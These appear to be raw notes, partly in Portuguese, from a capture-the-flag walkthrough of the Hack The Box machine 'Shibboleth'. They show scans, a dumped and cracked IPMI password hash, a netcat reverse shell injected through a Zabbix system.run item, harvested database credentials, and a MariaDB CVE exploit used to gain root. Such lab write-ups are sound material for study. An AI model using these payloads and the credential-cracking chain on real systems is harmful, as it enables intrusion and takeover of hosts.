nmap -sCV 10.10.11.124 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-24 17:22 EST
Nmap scan report for 10.10.11.124
Host is up (0.12s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://shibboleth.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: shibboleth.htb

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1679.29 seconds

ffuf -c -u http://shibboleth.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -e .html,.php,.txt -c

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://shibboleth.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 :: Extensions       : .html .php .txt 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

blog.html               [Status: 200, Size: 19196, Words: 5073, Lines: 426]
assets                  [Status: 301, Size: 317, Words: 20, Lines: 10]
forms                   [Status: 301, Size: 316, Words: 20, Lines: 10]
index.html              [Status: 200, Size: 59474, Words: 17014, Lines: 1324]
server-status           [Status: 403, Size: 279, Words: 20, Lines: 10]
.html                   [Status: 403, Size: 279, Words: 20, Lines: 10]
.php                    [Status: 403, Size: 279, Words: 20, Lines: 10]
                        [Status: 200, Size: 59474, Words: 17014, Lines: 1324]
changelog.txt           [Status: 200, Size: 499, Words: 76, Lines: 16]
Readme.txt              [Status: 200, Size: 218, Words: 11, Lines: 7]


 wfuzz -H "Host: FUZZ.shibboleth.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hh 290 --hc 302 http://shibboleth.htb/
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://shibboleth.htb/
Total requests: 4989

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                           
=====================================================================

000000099:   200        29 L     219 W      3684 Ch     "monitor"                                         
000000346:   200        29 L     219 W      3684 Ch     "monitoring"                                      
000000390:   200        29 L     219 W      3684 Ch     "zabbix"                                          

Total time: 60.71111
Processed Requests: 4989
Filtered Requests: 4986
Requests/sec.: 82.17605

 © Copyright FlexStart. All Rights Reserved
Powered by enterprise monitoring solutions based on Zabbix & Bare Metal BMC automation

https://docs.bmc.com/docs/ServerAutomation/89/bmc-server-automation-ports-653394538.html

-sU: UDP Scan

sudo nmap -sU --min-rate 5000 10.10.11.124
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-08 14:38 EST
Nmap scan report for shibboleth.htb (10.10.11.124)
Host is up (0.12s latency).
Not shown: 993 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
623/udp   open   asf-rmcp
1024/udp  closed unknown
19140/udp closed unknown
21366/udp closed unknown
34079/udp closed unknown
37843/udp closed unknown
49259/udp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 0.86 seconds

https://book.hacktricks.xyz/pentesting/623-udp-ipmi
 

[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:0d214bf3020e000080f292d281d1b4f9a8da271a7436d68c893170fa3ccdb3cb64d43070d4bb298ca123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:4ef981b8f9cdf0920ccab732bac62f80f4dc69ca

hashcat -m 7300 hash.txt /usr/share/wordlists/rockyou.txt -o adminpass.txt

Administrator:ilovepumkinpie1


http://monitor.shibboleth.htb/items.php?form=create&hostid=10084

https://www.zabbix.com/documentation/current/en/manual/appendix/command_execution#execution-steps
Zabbix uses common functionality for external checks, user parameters, system.run items, custom alert scripts, remote commands and user scripts.

Key:system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 4444 >/tmp/f &,nowait]
nc -vlp 4444

Clicar em test


cat zabbix.conf.php.example
<?php
// Zabbix GUI configuration file.

$DB['TYPE']                             = 'MYSQL';
$DB['SERVER']                   = 'localhost';
$DB['PORT']                             = '0';
$DB['DATABASE']                 = 'zabbix';
$DB['USER']                             = 'zabbix';
$DB['PASSWORD']                 = '';

// Schema name. Used for PostgreSQL.
$DB['SCHEMA']                   = '';

su ipmi-svc                                                                   
su ipmi-svc                                                                                                        
Password: ilovepumkinpie1                                                                                          
                                                                                                                   
ipmi-svc@shibboleth:/usr/share/zabbix$ cat /home/ipmi-svc/user.txt                                                 
cat /home/ipmi-svc/user.txt
e96dae0c5164c4a59a19aa3331a1cf31
ipmi-svc@shibboleth:/usr/share/zabbix$ 

/run/user/1000/gnupg/S.gpg-agent
/run/user/1000/gnupg/S.gpg-agent.ssh
/run/user/1000/gnupg/S.gpg-agent.extra
/run/user/1000/gnupg/S.gpg-agent.browser


### Option: DBUser
#       Database user.
#
# Mandatory: no
# Default:
# DBUser=

DBUser=zabbix

### Option: DBPassword
#       Database password.
#       Comment this line if no password is used.
#
# Mandatory: no
# Default:
DBPassword=bloooarskybluh


3 | Administrator | IPMI Service | Account       | $2y$10$FhkN5OCLQjs3d6C.KtQgdeCc485jKBWPW4igFVEgtIP3jneaN7GQe

Server version: 10.3.25-MariaDB
git clone https://github.com/Al1ex/CVE-2021-27928

Ao rodar viramos root
